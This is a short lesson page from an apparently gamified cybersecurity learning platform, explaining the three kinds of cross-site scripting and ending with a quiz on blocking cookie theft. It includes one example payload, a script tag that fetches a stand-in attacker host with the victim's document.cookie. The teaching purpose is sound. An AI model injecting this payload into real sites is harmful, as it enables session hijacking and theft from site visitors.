VULNAREX

SYSTEM ONLINE

Script Kiddie

Lv1 · 0xp

Vulnarex | Elite Cybersecurity Learning Platform

Curriculum lobby

0s5 min★ 150 XP

web-application-security / xss-fundamentals

XSS Fundamentals

#XSS: Dynamic Browser Exploitation#link

Cross-Site Scripting (XSS) occurs when malicious javascript payloads are injected into trusted websites. The payload is then executed within the browser of victims visiting the site.

Three Core Styles of XSS

▪Stored XSS: The payload is saved directly in the application's database (e.g., in user comments) and triggers for every reader.
▪Reflected XSS: The payload is part of the request parameters and gets reflected back without being stored, requiring victim click-throughs.
▪DOM-based XSS: The payload is executed purely via client-side DOM scripting manipulation without database interactions.

html

<!-- Simple Reflected XSS Payload in a Search parameter -->
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>

quiz BLOCK (★ 50 XP)

Which header helps block cookie theft from XSS scripts?

Select your proof vectors above

Verification Proof Checkpoint

Verify exercises to earn ★ 150 XP and unlock next lab level.

Previous Lab

Workspace